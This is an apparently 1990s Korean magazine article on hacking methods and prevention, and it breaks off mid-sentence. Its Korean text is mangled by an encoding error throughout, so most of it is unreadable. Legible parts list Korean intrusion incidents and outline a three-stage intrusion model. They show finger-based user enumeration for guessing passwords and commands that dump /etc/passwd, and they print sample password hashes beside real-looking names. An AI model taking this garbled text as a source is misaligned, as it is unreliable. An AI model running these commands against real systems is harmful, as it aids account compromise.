ÇØÅ·ÀÇ ÃֽŠÇüÅÂ¿Í ¹æÁö Å×Å©´Ð ÀÎÅͳÝÀÇ °³¹æ¼º°ú Á¤º¸°øÀ¯ ¹× ±³È¯ÀÇ ¿ëÀ̼ºÀ¸·Î ÀÎÇØ ÀÎÅͳݻçÀÇ ÇØÅ·»ç°ÇÀº ³¯·Î ±× ºóµµ¼ö°¡ ³ô¾Æ°¡¸ç ±× À¯Çü ¶ÇÇÑ °í µµÈ­ÇÏ°í ±×·Î ÀÎÇÑ ÇÇÇØÀÇ ½É°¢¼ºÀº ÇÏ·ç°¡ ´Ù¸£°Ô º¯¸ðÇÏ°í ÀÖ´Ù. ƯÁýII¿¡¼­´Â 5¿ùÈ£¿Í 6¿ùÈ£ µÎ´Þ¿¡ °ÉÃÄ ÇØÅ·¹æÁö Å×Å©´ÐÀ» ±âȹÇß´Ù. À̸¦ ÅëÇØ ÇØÅ·ÆÐÅÏÀÇ º¯È­¸¦ »ìÆ캸°í, ÃÖ±Ù¿¡ ÀϾ°í ÀÖ´Â ±¸Ã¼ÀûÀÎ ÇØÄ¿ ħÀÔ°æ·Î¿Í ÇüÅÂ, ±×¸®°í ±×¿¡ ´ëÇÑ ¹æ ÁöÃ¥À» ÀÚ¼¼È÷ µé¿©´Ùº¸±â·Î ÇÑ´Ù. Ãʺ¸ÀÚµéÀÇ ÀÌÇظ¦ µ½±â À§ÇØ ÇØÅ·°ú º¸¾È¿¡ °ü·ÃÇÑ °³°ýÀûÀÎ ³»¿ëÀº ¿ù°£ Internet 95³â 7¿ù È£ºÎÅÍ 11¿ùÈ£¸¦ ÂüÁ¶Çϱ⠹ٶõ´Ù. ÇØÅ·ÀÇ ±âº» °ñ°ÝÀ» ÀâÀÚ! Àü»êÇаúÀÎ K±ºÀº Çаú ¼ºÀûÀÌ ¾ÆÁÖ ÁÁÁö ¸øÇÏ´Ù. ÇÏ Áö¸¸ ½Ç·Â¸¸Àº ´©±¸º¸´Ùµµ ÀÖ´Ù°í ÀںνÉÀ» °¡Áö°í ÀÖ´Ù. ÇÏÁö¸¸ ¼ºÀûÀÌ ³ª»Ú´Ù´Â ÀÌÀ¯¸¸À¸·Î ¾Æ¹«µµ ÀÎÁ¤À» ÇØÁÖÁö ¾ÊÀÚ ÀڱⰡ ÀÎÁ¤¹ÞÀ» ¼ö ÀÖ´Â °÷Àº °¡»ó¼¼°è»ÓÀ̶ó°í »ý°¢ÇÏ°Ô µÆ´Ù. ±× µÚ·Î K±ºÀÌ ¿­À» ¿Ã¸®°Ô µÈ °ÍÀº ÇØÅ·À̾ú´Ù. K±ºÀº ½É½ÉÇÏ°í ¹«·á ÇÔÀ» ´Þ·¡±â À§ÇØ ´ëÇüÅë½Å¸Á¿¡¼­ äÆÃÀ» Áñ±â°í ÀÖ´Ù. öÀúÇÏ°Ô À§ÀåÇØ ÀÚ½ÅÀÇ ½ÅºÐÀ» °¨Ãáä R¾ç°ú äÆÃÀ» Áñ±â°í ÀÖ´Ù. R¾çÀÇ ÁÖ¼Ò¿Í ºñ¹Ð¹øÈ£ µîÀ» Á¶»çÇØ ±×³à¸¦ ³î¶ó°Ô Çϸç Áñ °Å¿ò¿¡ ºüÁø´Ù. R¾çÀÇ Áֹεî·Ï¹øÈ£¸¦ ¾Ë¾Æ³» ÀºÇà°øµ¿¸Á¿¡¼­ ±×³àÀÇ °èÁ˸¦ ÃßÀû, ÀڽŰú äÆÃÇÑ '´ë°¡'·Î µ·À» ÀÚ½ÅÀÇ ±¸Á·ΠÀÌüÇÑ´Ù. ¾Æ, ±×·¡µµ ½É½ÉÇÏ´Ù. ¸ð ´ëÇп¡ µé¾î°¡ ÇлýµéÀÇ ¼ºÀûÀ» ¿­¶÷ÇÑ´Ù. °íµîÇб³¶§ ºÎÅÍ ²Ãº¸±â ½È´ø ³ðÀÌ ÀÖ¾ú´Ù. ±× ³à¼®ÀÇ ¼º ÀûÀ» ¸ðµÎ F·Î ¸¸µé¾î¹ö¸°´Ù. ¼ÓÀÌ Á» ÈÄ·ÃÇÏ´Ù. ¾Æ.. ½É½ÉÇØ. ´õ ¹»ÇÒ±î... À§ÀÇ ³»¿ëÀº ¾î¶² ÇлýÀÌ Å»¼±ÀÇ ±æ·Î ºüÁø °ÍÀ» °¡»óÀ¸·Î ²Ù¸çº» ±ÛÀÌ´Ù. ÃÖ±Ùµé¾î ÇØÅ·À̶õ ´Ü¾î¸¦ »ç¶÷µéÀÌ ¸¹ÀÌ Á¢ÇÏ°í´Â ÀÖÁö¸¸ Á¤È®È÷ ¾î¶°ÇÑ ¶æÀ» °®°í ÀÖ°í ÇØÅ·¿¡´Â ¹«¾ùÀÌ ÀÖ´ÂÁö Á¤È®È÷ ¾Æ´Â »ç¶÷µéÀº ±×·¸°Ô ¸¹Áö ¾Ê´Ù. ¿ÀÈ÷·Á ¾ð·ÐÀÇ ÇØ Å·¿¡ ´ëÇÑ ¿Àº¸ ¶§¹®¿¡ ÀÎÅͳݿ¡ ´ëÇÑ À߸øµÈ ¼±ÀÔ°üÀ» °®°Ô ÇÏ´Â ¼öµµ ÀÖ´Â °ÍÀÌ´Ù. À§ÀÇ °¡»óÀÇ ±Û¿¡¼­ º¸ÀÎ ¿¹´Â ÇØÄ¿¿¡ ´ëÇÑ À߸øµÈ ÀνÄÀÌ ´ã°ÜÀÖ´Ù. ±×·¸´Ù¸é ÇØÅ·À̶õ ¹«¾ùÀΰ¡? ÁøºÎÇÑ ¸éÀÌ ÀÖ±ä ÇÏÁö¸¸ hacker's dictionay¸¦ ÂüÁ¶Çϱâ·Î ÇÏÀÚ. Hacker: 1. A person who enjoys learning the details of computer systems and how to stretch their capabilities - as opposed to most users of computers, who prefer to learn only the minimum amount necessary. 2.One who programs enthusiastically or who enjoys programming rather than just theorizing about programming. - Guy L.Steele. et al. The Hacker's Dictionary ÇØÄ¿¶õ, ÄÄÇ»ÅÍ¿¡ Á¤¿­À» °¡Áö°í ¿­½ÉÈ÷ ¸ôµÎÇÏ´Â »ç¶÷µéÀ» ¶æÇÑ´Ù. ¿ÀÈ÷·Á ¾ð·Ð¿¡¼­³ª Àϻ󿡼­ ¶°µ¹°í ÀÖ´Â ÇØÄ¿¶ó´Â ´Ü¾î´Â Å©·¡Ä¿(Cracker)³ª ½Ã½ºÅÛħÀÔÀÚ(system intruder)ÀÇ ¶æ¿¡ ´õ °¡±õ´Ù°í ÇÒ ¼ö ÀÖ´Ù. ÃÖ±Ù¿¡´Â °¢Á¾ ¾ð·ÐÀ̳ª ±â°ü¿¡¼­ ÇØÅ·¿¡ »ó´çÈ÷ ¹Î°¨ÇÑ ¹ÝÀÀÀ» º¸ÀÌ°í ÀÖ´Â °ÍÀÌ ¿äÁò µé¾î »ó´çÈ÷ Å©°í ÀÛÀº ÇØÅ· »ç°ÇµéÀÌ ÀÚÁÖ ÀϾ±â ¶§¹®ÀÌ´Ù. ÀÎÅͳÝÀÌ È®»êµÊ¿¡ µû¶ó ÀÌ·¯ÇÑ Çö»óÀº ´õ¿í µÎµå·¯Áú °ÍÀ¸·Î º¸ÀδÙ. ÇØÅ·¿¡ ´ëºñÇÑ °¡Àå ¹«¼­¿î ¹æ¾î¹ýÀº ¹é¾÷ÀÌ ¾Æ´Ò±î ½Í´Ù. ÀÌ´Â ¹°·Ð °¡Àå ±âº»ÀûÀÎ ´ëºñÃ¥À̱⵵ ÇÏ´Ù. "Çϵåµð½ºÅ©¸¦ ¹Ð ¾î¹ö¸®·Á¸é ¹Ð¾îºÁ¶ó. ¿ì¸®´Â ³¯¸¶´Ù ¹é¾÷ ¹Þ´Â´Ù³×" "¾îÁ¦ Áö¿ì°í °¬À¸¸é ¿À´Ã ¶Ç »ì·Á³õÀ¸¸é µÇÁö ¹¹." ÀÌ·¸°Ô µÈ´Ù¸é ÇØÅ·ÇÒ ¸ÀÀÌ ³¯±î? ÇØÅ· ¹æÁö¹ýÀ» ÀÍÈ÷±â¿¡ ¾Õ¼­ °£´ÜÈ÷ ±¹³»¿¡¼­ ÀϾ¾ú´ø ÇØÅ· »ç·ÊµéÀ» »ìÆ캸°í ÀÌÀüÀÇ ÇØÅ·À¯Çü °ú ÃֽŠÇØÅ· »ç·ÊµéÀ» ÀÚ¼¼È÷ »ìÆ캻´Ù. ±¹³»¿¡¼­ ¹ß»ýÇÑ ÇØÅ· »ç·Ê 1. SERI(½Ã½ºÅÛ °øÇÐ ¿¬±¸¼Ò)ÀÇ ½´ÆÛÄÄ ¼¾Åͳ» CRAY 2S¿¡ ÇØÄ¿°¡ ħÀÔ, ½Ã½ºÅÛÀ» ±³¶õÇÑ ¿¹. (1992) 2. ¼­¿ï´ëÇб³ Àü»ê¼¾ÅÍ¿¡ ÇØÄ¿µéÀÌ ¼­¿ï´ëÀÇ LAN¿¡ ħÀÔÇØ ¿öÅ©½ºÅ×ÀÌ¼Ç 6´ëÀÇ ¸ðµç Çϵåµð½ºÅ©¸¦ Áö¿ö¹ö¸° ¿¹. (1993) 3. Çѱ¹Åë½Å¿¬±¸°³¹ß¼¾ÅÍ, Çϳª¸Á °ü¸®¼¾ÅÍ¿¡¼­µµ ¼­¿ï´ë¿Í À¯»çÇÑ »ç°ÇÀÌ ¹ß»ý (1993) 4. ¿øÀÚ·Â ¿¬±¸¼Ò¿¡ ¿µ±¹ ¼Ò³âÇØÄ¿°¡ ħÀÔ(»ç½ÇÀº ÀÌ¿Í À̸§ÀÌ ºñ½ÁÇÑ ´ëÇÐÀÇ È£½ºÆ®¿¡ ħÀÔÇÑ °ÍÀÌÁö¸¸ ¾ð·ÐµéÀÇ ÇãÀ§,°úÀ庸µµ·Î À߸ø ¾Ë·ÁÁø »ç°Ç)ÇØ ÇÏµå µð½ºÅ©ÀÇ Á¤º¸°¡ ¿ÜºÎ¿¡ °³¹æµÆ´ø »ç°Ç (1994) 5. Çѱ¹ Àü»ê¿ø, KRNIC(Çѱ¹ ¸ÁÁ¤º¸¼¾ÅÍ) ÇØÅ·»ç°Ç:±¹³» ³×Æ®¿öÅ© Á¤º¸¼­¹ö¿¡ ÇØÄ¿°¡ ħÀÔÇÑ »ç°Ç (1994) 6. ¼­°­´ëÇб³ÀÇ ¾ÆÅ°¼­¹ö¿¡ ħÅõÇØ µð½ºÅ©¸¦ Áö¿ö¹ö¸° »ç°Ç (1994) 7. KAIST ÇØÅ· »ç°Ç:¿µ¾î±ÇÀÇ ÇØÄ¿°¡ ħÅõÁß KUS(KAIST Unix Security task force)¸â¹ö¿¡ °Ô Àû¹ßµÈ ¿¹ À§ÀÇ »ç°ÇµéÀº ½Å¹®Áö»ó¿¡¼­ ¸¹ÀÌ Á¢Çغ» °ÍµéÀÌ´Ù. ¹°·Ð Å©°í ÀÛÀº ÇØÅ· »ç°ÇÀÌ ¹«¼öÈ÷ ¸¹ÀÌ ÀϾ¾úÁö¸¸ ±½Á÷ÇÑ »ç°Çµé¸¸ ³ª¿­Çß´Ù.ÀÌ¿Í °°ÀÌ ¸¹Àº º¸¾È »ç°ÇÀÌ ¹ú¾îÁö´Â »óȲ¿¡¼­ ½Ã½ºÅÛÀÇ °ü¸®ÀÚ³ª »ç¿ëÀÚÀÇ ÀÔÀå¿¡¼­ ¹«¾ùÀ» Çؾ߸¸ÀÌ ÇØÄ¿µéÀÇ Ä§ÀÔ À» ¸·À» ¼ö ÀÖÀ»±î? ¶ÇÇÑ µ¶µµ´Â ÀڱⶥÀ̶ó°í ¿ì°Ü´ë´Â ¾â¹Ì¿î ÀϺ»ÀÇ Àü»ê¸ÁÀ» ¹«·ÂÈ­½ÃÅ°·Á¸é ¾î¶² ÀÛ¾÷À» ÇØ¾ß ÇÒ°¡? ÇÏÁö¸¸ µ¶ÀÚµéÀÌ ¿ì¼± ÀÌÇØÇϱ⠽±µµ·Ï ±âÃÊÀûÀÎ ³»¿ëÀ» ¸ÕÀú Àû¾î ³õÀ»±î ÇÑ´Ù. ÇØÅ·ÀÇ °³³ä°ú Á¾·ù ´ëºÎºÐÀÇ ½Ç·ÂÀÖ´Â ÇØÄ¿µéÀº ´Ù¸¥ ½Ã½ºÅÛ¿¡ ħÅõ¸¦ ÇÏ´õ¶óµµ ´ëÀǸíºÐ(?)ÀÌ ÀÖ´Â °æ¿ì°¡ ´Ù¹Ý»ç´Ù. ÀڱⰡ °ü¸®ÇÏ´Â ½Ã½ºÅÛ¿¡ ´Ù¸¥ ÇØÄ¿°¡ µé¾î¿Í¼­, À̸¦ ½Å¼ÓÈ÷ ÃßÀûÇϱâ À§ÇØ ¿ªÇØÅ·ÇÏ´Â °æ¿ìÀÇ ¿¹¸¦ µé ¼ö ÀÖ°Ú´Ù. ¶ÇÇÑ ¾î´À Á¤µµ ½Ç·ÂÀÖ´Â ÇØÄ¿µéÀÇ °æ ¿ì¿¡´Â ÇØÄ¿¸®Áò¿¡ °üÇÑ °ÇÀüÇÑ ¸¶Àε尡 Çü¼ºµÅ ÀÖ´Â »ç¶÷µéÀÌ ¸¹±â ¶§¹®¿¡ À̵éÀÌ È¤½Ã Àڱ⠽ýºÅÛ¿¡ ÇÇÇظ¦ ÀÔÈ÷Áö ¾ÊÀ»±î °ÆÁ¤ÇÒ ÇÊ¿ä´Â ¾ø´Ù. ´Ù¸¸ °ÆÁ¤ÀÌ µÇ´Â °ÍÀº Áß°í»ýµéÀÌ ÄÄÇ»Åͳª À¯´Ð½º¿¡ °üÇÑ Àü¹®ÀûÀÎ Áö½Äµµ ¾øÀ¸¸é¼­ ¸·¿¬ÇÑ °ø¸í½É°ú ¾û¶×ÇÑ ¿µ¿õ½É¿¡ ÈÛ¾µ·Á ÇØÅ·À» ÇÏ°Ô µÇ´Â °æ¿ìÀÌ´Ù. À̵éÀº ¾î¼´Ù ±¸ÇÑ ÇØÅ·ÅøÀ» ÀÌ¿ëÇØ, ÇØÅ·À» Çϸç ÀڽŵéÀÌ Ä§Åõ¸¦ Çß´Ù´Â Áõ°Åµµ Áö¿ì°í ³ª°¡Áö ¸øÇÏ´Â °æ¿ì°¡ ´ëºÎºÐÀÌ´Ù. ÀÌ·¯ÇÑ »óȲ¿¡¼­ Áß°í»ýµéÀÌ ¿ì¿¬È÷ ħÅõÇÏ°Ô µÇ¾ú´Ù°¡ ÀâÈ÷°Ô µÇ¸é ±×µéÀÇ Àλý¿¡´Â ¾î´Àµ¡ Àü°úÀÚ ¶ó´Â ±â·ÏÀÌ ³²°Ô µÇ´Â °ÍÀÌ´Ù.¤Ô ÇØÅ·À̶õ ¹ý·üÀûÀÎ Àǹ̿¡¼­ º¸¸é '½Ã½ºÅÛÀÇ °ü¸®ÀÚ°¡ ±¸ÃàÇØ ³õÀº º¸¾È¸ÁÀ» ¾î¶² ¸ñÀû¿¡¼­°Ç ¹«·ÂÈ­½ÃÄ×À» °æ¿ì ÀÌ¿¡ µû¸¥ ¸ð µç ÇൿÀ» ÇØÅ·À̶ó°í ÇÑ´Ù.'°í µÅÀÖ´Ù. ÇÏÁö¸¸ ³×ƼÁ𰣿¡´Â º¸Åë ½Ã½ºÅÛ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ºÒ¹ýÀûÀ¸·Î ȹµæÇÑ °æ¿ì, ¶Ç À̸¦ ¾Ç ¿ëÇØ ´Ù¸¥ »ç¿ëÀÚ¿¡°Ô ÇÇÇظ¦ ÁØ °æ¿ì¸¦ ÇØÅ·À̶ó°í Á¤ÀÇÇÏ°í ÀÖ´Ù. (°£´ÜÇÑ ÇØÅ·À¸·Î ¾î¶² »ç¿ëÀÚÀÇ Æнº¿öµå¸¦ ÃßÃøÀ» ÅëÇؼ­ °Ç, ¿ì¿¬È÷ ¾Ë°Ô µÇ¾î¼­°Ç µµ¿ëÀ» ÇÏ°Ô µÆÀ» °æ¿ì¸¦ µé ¼ö ÀÖ´Ù.) ÇØÅ·ÀÇ 3´Ü°è ÀýÂ÷ ¾î¶² È£½ºÆ®¸¦ ÇØÅ·Çϱâ À§Çؼ­´Â º¸Åë 3´Ü°è ÀýÂ÷¸¦ °ÅÄ¡°Ô µÈ´Ù. 1´Ü°è·Î ¸ñÇ¥·Î ÇÑ È£½ºÆ® ³»ºÎ¿¡ ÀâÀÔÀ» ÇÏ¿© ½©(shell)À» »ç¿ëÇÒ ¼ö ÀÖ´Â À¯ÀúÀÇ ±ÇÇÑÀ» ¾ò¾î ³»´Â °ÍÀÌ´Ù. À̸¦ ½ÇÇàÇϱâ À§ÇØ À¯ÀúÀÇ Æнº¿öµå¸¦ ¾Ë¾Æ¾ß Çϴµ¥, ½º´ÏÇÁ(sniff)¸¦ ÀÌ¿ë ÇÏ´Â °í±Þ¹æ¹ý¿¡¼­ºÎÅÍ, finger -l @targethost¸¦ ÇØ ¾Ë¾Æ³½ »ç¿ëÀÚµéÀÇ Æнº¿öµå¸¦ ÃßÃøÇØ ·Î±äÇÏ´Â ¹«½ÄÇÑ ¹æ¹ý±îÁö ¾ÆÁÖ ´Ù¾ç ÇÑ ¹æ¹ýÀÌ ÀÖ´Ù. º¸ÅëÀÇ ÇØÄ¿¶ó¸é ¿ÜºÎ¿¡¼­ ¸ñÇ¥·Î ÇÑ È£½ºÆ®ÀÇ Æнº¿öµå ÆÄÀÏÀ» »©¿Í¼­ À̸¦ ÀÌ¿ëÇØ ¸ñÇ¥·Î ÇÑ È£½ºÆ® ³»ºÎÀ¯Àú·Î ħÀÔÇÏ´Â °Í ÀÌ º¸ÅëÀÌ´Ù. ±×¸®°í ÀÌ 1´Ü°è¸¦ ¹æ¾îÇÏ´Â °ÍÀÌ ¹Ù·Î ³×Æ®¿öÅ© ½ÃÅ¥¸®Æ¼ÀÌ´Ù. 2´Ü°è·Î ¸ñÇ¥·Î Çß´ø È£½ºÆ® ³»ºÎ¿¡ ÀâÀÔÀ» ÇßÀ¸¸é ¸ñÇ¥ È£½ºÆ®ÀÇ °ü¸®ÀÚ(root)ÀÇ ±ÇÇÑÀ» ȹµæÇÏ·Á°í ½ÃµµÇÒ °ÍÀÌ´Ù. À̴ ȣ½º Æ® ³»ºÎÀÇ OS Ȧ(hole)À» ÀÌ¿ëÇÏ´Â °æ¿ì°¡ ¸¹´Ù. ¶ÇÇÑ ÀÌ 2´Ü°è¸¦ ¹æ¾îÇÏ´Â °ÍÀÌ ¹Ù·Î ·ÎÄà ½ÃÅ¥¸®Æ¼ÀÌ´Ù. 3´Ü°è´Â È£½ºÆ® °ü¸®ÀÚ(root)ÀÇ ±ÇÇÑÀ» ȹµæÇÑµÚ ÀÚ½ÅÀÌ ´ÙÀ½¿¡ ´Ù½Ã ħÀÔÇÒ °æ¿ì¿¡ ÆíÀǼºÀ» ±âÇϱâ À§ÇØ backdoor(µÞ¹®)À» ¸¸ µé¾î ³õ°í ³ª°¡´Â ´Ü°èÀÌ´Ù. ¸Å¹ø ¸ñÇ¥·Î ÇÑ È£½ºÆ®¿¡ ÀâÀÔÇϱâ À§ÇØ ¹ø¹øÈ÷ ÇØÅ·À» ½ÃµµÇÑ´Ù¸é Áõ°Å¸¦ ¾ðÁ¨°¡ ³²±â±â ¸¶·ÃÀÌ°í '²¿¸®°¡ ±æ¾îÁ®¼­' °á±¹Àº ÀâÈ÷±â ¸¶·ÃÀÌ´Ù. ÀڽŸ¸ÀÌ »ç¿ëÇÒ ¼ö ÀÖ´Â ³»ºÎ ¹ö±×(Æ®·ÎÀÌ ¸ñ¸¶)¸¦ ³²°Ü³õ°í °¡´Â °ÍÀÌ Ä§ÀÔ¶§ Áõ °Å¸¦ ³²±âÁö ¾Ê´Â ÁÁÀº ¹æ¹ýÀ̱⠶§¹®¿¡ ÇØÄ¿µéÀº À̸¦ ¾Ö¿ëÇÏ°í ÀÖ´Ù. ÇØÅ·ÀÇ ÀÌÇظ¦ µ½±âÀ§ÇÑ À¯´Ð½º »óÀÇ ±âÃÊ»ó½Ä ÀÌÁ¦ºÎÅÍ ³ª¿À´Â ³»¿ëµéÀº ÇØÅ·À» ÀÌÇØÇϱâ À§ÇÑ À¯´Ð½º»óÀÇ ±âÃÊ Áö½ÄÀÌ´Ù. Æнº¿öµå´Â ¾î¶»°Ô °ü¸®µÇ´Â°¡? º¸Åë µµ¿ëÇÑ ID¸¦ ÀÌ¿ëÇØ ´Ù¸¥ ½Ã½ºÅÛÀ̳ª IDÀÇ ¼ÒÀ¯ÁÖ°¡ »ç¿ëÇÏ°í ÀÖ´Â ½Ã½ºÅÛÀÇ °ü¸®ÀÚ(root, Super user)ÀÇ ÀÚ°ÝÀ» ¾ò¾î³»±â À§ÇÑ ¹ßÆÇÀ¸·Î »ï´Â °æ¿ì°¡ ÀÖ´Ù. ±×·¯¹Ç·Î ÀÚ½ÅÀÇ µµ¿ë´çÇÑ ID ¶§¹®¿¡ ÇÇÇظ¦ º» ÂÊ¿¡¼­ Á¶»ç¸¦ ÇÑ´Ù¸é ÀÚ½ÅÀÌ ÇÏÁöµµ ¾ÊÀº ÀÏ ¿¡ ÀǽÉÀ» »ç°Ô µÉ ¼öµµ ÀÖ°Ô µÇ´Â °ÍÀÌ´Ù. ¶ÇÇÑ ID¸¦ µµ¿ë´çÇϸé ÀڽŸ¸ÀÇ ÇÇÇØ·Î ³¡³ª´Â ÀÏÀÌ ¾Æ´Ñ ½Ã½ºÅÛÀÇ ÇÇÇرîÁöµµ ¾ß±âÇÒ ¼ö Àֱ⠶§¹®¿¡ Æнº¿öµå¸¦ °ËÁõÇÏ´Â Àý Â÷¸¦ µÎ¾î Æнº¿öµå¸¦ ¸ð¸£´Â ¿ÜºÎÀÎÀº »ç¿ëÇÏÁö ¸øÇϵµ·Ï ¸·°í ÀÖ´Â °ÍÀÌ´Ù. ÇÏÁö¸¸ ÀÌ Æнº¿öµå¸¦ »ç¿ëÇÏ°í ÀÖ´Ù ÇÏ´õ¶óµµ ¹®Á¦´Â ÀÖ´Ù. ¸¸ÀÏ ´Ù¸¥»ç¶÷µµ ÃæºÐÈ÷ ÃßÃøÇس¾ ¼ö ÀÖ´Â °ÍÀ¸·Î Æнº¿öµå¸¦ Á¤Çß ´Ù¸é ´Ù¸¥ »ç¶÷ÀÌ ¸¶À½¸¸ ¸ÔÀ¸¸é ÀÚ½ÅÀÇ ID¸¦ »ç¿ëÇÒ ¼ö ÀÖÀ¸¹Ç·Î ¹«¿ëÁö¹°ÀÌ µÇ´Â °ÍÀÌ´Ù. ±×·¡¼­ ÀÚ½ÅÀÇ Æнº¿öµå¸¦ °ü¸®ÇÏ´Â °Í¿¡ ´ëÇØ ¸»Çغ¼±î ÇÑ´Ù. À¯´Ð½º ½Ã½ºÅÛÀº °¢ À¯ÀúµéÀÇ Æнº¿öµå ¹× ±âŸ Á¤º¸¸¦ /etc/passwd¿¡ º¸°üÇÏ°íÀÖ´Ù. vi³ª catÀ» ÀÌ¿ëÇØ ÀÌ ÆÄÀÏÀ» »ìÆ캸ÀÚ.( ´Ü, º¸´Â ¹æ¹ýÀÌ ¾î¶² ½Ã½ºÅÛÀ» ¾²´À³Ä¿¡ µû¶ó ´Ù¸£´Ù. À§ÀÇ °ÍÀº ÀϹÝÀûÀÎ °æ¿ìÀÌ°í À§¿¡ ³ª¿Â NIS ½Ã½ºÅÛÀº NFS ½Ã½ºÅÛ°ú ÇÔ²² °°ÀÌ µÚ¿¡¼­ ¼³¸íÇÏ°íÀÚ ÇÑ´Ù.) * NIS ½Ã½ºÅÛÀ» ÀÌ¿ëÇÏ´Â °æ¿ì: cat /etc/passwd³ª ypcat passwd¸¦ ÇÑ´Ù. * NetInfo ½Ã½ºÅÛÀ» ÀÌ¿ëÇÏ´Â °æ¿ì: nidump passwd / ¸¦ ÇÑ´Ù. ¿¹½Ã·Î ¸îÁÙ¸¸ µé¾îº¸ÀÚ. root:##root:0:0:Supervisor:/:/bin/csh daemon:##daemon:1:1::/: uucp:##uucp:4:8::/var/spool/uucppublic: kwlee:##kwlee:104:30:KyeongWon Lee:/circ/kus/kwlee:/usr/local/bin/tcsh sakai:##sakai:129:30:Kim Huy kang:/circ/kus/sakai:/usr/local/bin/tcsh hohle:##hohle:11529:410:Hoh eun ha:/under/under/hohle:/bin/csh sungho:##sungho:13189:410:Park sung ho :/under/under/sungho:/bin/csh À§¿Í °°ÀÌ : À¸·Î ±¸ºÐµÈ µÎ¹ø° ºÎºÐÀÌ À§¿Í °°ÀÌ µÅÀÖ´Â °æ¿ìµµ ÀÖÀ» °ÍÀÌ°í ¶Ç´Â root:VRLoJ2QnLhRA2:0:0:Supervisor:/:/bin/csh daemon:*1:1::/:: uucp:*:4:8::/var/spool/uucppublic: kwlee:ntim9ljaUGI.A:104:30:KyeongWon Lee:/circ/kus/kwlee:/usr/local/bin/tcsh sakai:tdtwKgRa3ZZoI:129:30:Kim Huy kang:/circ/kus/sakai:/usr/local/bin/tcsh hohle:u2WKlqINaIP8w:11529:410:Hoh eun ha:/under/under/hohle:/bin/csh sungho:eATMm4J0Zb4Dw:13189:410:Park sung ho :/under/under/sungho:/bin/csh À§¿Í °°Àº °æ¿ìµµ ÀÖÀ» °ÍÀÌ´Ù. µÎ ÆÄÀÏÀ» Çѹø »ìÆ캸ÀÚ. ù ¼¼ÁÙÀº root,daemon,uucp¶ó´Â ½Ã½ºÅÛ °èÁ¤(account)¿¡ °üÇÑ Á¤º¸ ÀÌ°í ±× ´ÙÀ½¿¡ ³ª¿À´Â ÁÙµéÀº kwlee³ª sakai °°Àº ½Ã½ºÅÛÀÇ ÀÏ¹Ý À¯Àúµé¿¡ °üÇÑ Á¤º¸ÀÌ´Ù. °¢°¢ÀÇ ÁÙÀº : À» ±âÁØÀ¸·Î ´ÙÀ½°ú °°Àº 7°³ÀÇ Çʵå(field)·Î ³ª´¶´Ù. * 1 Field : À¯Àú À̸§ * 2 Field : À¯ÀúÀÇ Æнº¿öµå(º¸Åë º¸¿©ÁÖÁö ¾Ê°Å³ª ¾Ë¾Æº¸Áö ¸øÇÏ°Ô º¯Çü½ÃÄÑ ³õ´Â´Ù.) * 3 Field : À¯ÀúÀÇ ID number(UID) * 4 Field : À¯Àú°¡ ¼ÓÇØÀÖ´Â ±×·ìÀÇ ID number(GID) * 5 Field : À¯ÀúÀÇ ½ÇÁ¦ À̸§ * 6 Field : À¯ÀúÀÇ È¨ µð·ºÅ丮 * 7 Field : À¯Àú°¡ »ç¿ëÇÏ´Â Shell ±× ¿¹¸¦ µé¾îº¸ÀÚ. À§¿¡¼­ sakai¶õ »ç¶÷À» »ìÆ캸¸é sakai:##sakai:129:30:Kim Huy kang:/circ/kus/sakai:/usr/local/bin/tcsh sakai:tdtwKgRa3ZZoI:129:30:Kim Huy kang:/circ/kus/sakai:/usr/local/bin/tcsh 1. À¯ÀúÀ̸§: sakai 2. password: ##sakai(ÀǵµÀûÀ¸·Î Æнº¿öµå ºÎºÐÀ» ¼û±ä °æ¿ì->Shadowing passwd ¶ó°íµµ ¸»ÇÑ´Ù.) tdtwKgRa3ZZoI(º¯Çü½ÃÄѼ­ ¾ËÁö ¸øÇÏ°Ô ÇÑ °æ¿ì.º¸Åë encrypt(¾Ïȣȭ)½ÃÄ×´Ù°í ¸»ÇÑ´Ù.) 3. UID : 129 4. GID : 30 5. ½ÇÁ¦ À¯ÀúÀÇ À̸§: Kim Huy kang 6. À¯ÀúÀÇ È¨µð·ºÅ丮:/circ/kus/sakai 7. À¯Àú°¡ »ç¿ëÇÏ´Â ½©: tcsh À§¿Í °°Àº Á¤º¸¸¦ ¾òÀ» ¼ö°¡ ÀÖ´Ù. Æнº¿öµå´Â ¾î¶»°Ô ¸¸µé¾îÁö´Â°¡? ±×·³ À§ÀÇ º¯ÇüµÈ ºÎºÐÀº ¾î¶»°Ô »ý¼ºµÇ´Â °ÍÀϱî? ´ÙÀ½À» ¼öÇà½ÃÄѺ¸ÀÚ. % /usr/lib/makekey iakasbells lsDy0cB/5/zho> % /usr/lib/makekey sakaixvaaa aaxuEmMgYNZz2> µÎ¹øÀÇ ½ÇÇà°á°ú¸¦ ºñ±³ÇØ º¸ÀÚ. °øÅëÁ¡Àº ÀÔ·ÂÇÑ ±Û¼èÁß¿¡¼­ ³¡¿¡¼­ µÎ¹ø°ºÎÅÍÀÇ ±Û¾¾´Â ´ÙÀ½ ÁÙÀÇ ¾ÏȣȭµÈ ºÎºÐ¿¡ ±×´ë·Î ÂïÇô ³ª¿À°í ³ª¸ÓÁö ºÎºÐÀº ¾Ë¾Æº¸Áö ¸øÇÏ°Ô º¯ÇüµÇ¾î ³ª¿Â °ÍÀ» ¾Ë ¼ö ÀÖ´Ù. À§ÀÇ ¿¹¿¡¼­ ÀÔ·ÂÇÑ ´Ü¾î iakasbellsÀÇ ¸¶Áö¸· µÎ ±ÛÀÚ ls¿Í ´ÙÀ½¿¡ º¯ÇüµÈ ´Ü¾î lsDy0cB/5/zho>ÀÇ Ã¹ ls¿Í °°´Ù. ÀÌ ¸¶Áö¸· µÎ ±ÛÀÚµéÀ» key character(ȤÀº salt)¶ó°í ÇÑ´Ù. ÀÌ·± ¹æ½ÄÀ¸·Î ·Î±×Àγ×ÀÓÀ» ÀÔ·ÂÇÑ ÈÄ Æнº¿öµå¸¦ ÀÔ·ÂÇÏ¸é ¸Ç ¸¶ Áö¸·ÀÇ µÎ¹ø° ±ÛÀÚµéÀ» °¡Áö°í ÀÔ·ÂÇÑ Æнº¿öµå¸¦ ¾ÏȣȭÇÏ°Ô µÇ°í ÀÌ ¾ÏȣȭÇÑ ÀڷḦ °¡Áö°í /etc/passwd¿Í ³»¿ëÀ» ºñ±³ÇÏ¿© ¿Ç´Ù¸é ·Î±×Àο¡ ¼º°øÇÏ°Ô µÇ´Â °ÍÀÌ´Ù. º¸Åë Æнº¿öµå´Â 8ÀÚ¸¦ ±âÁØÀ¸·Î 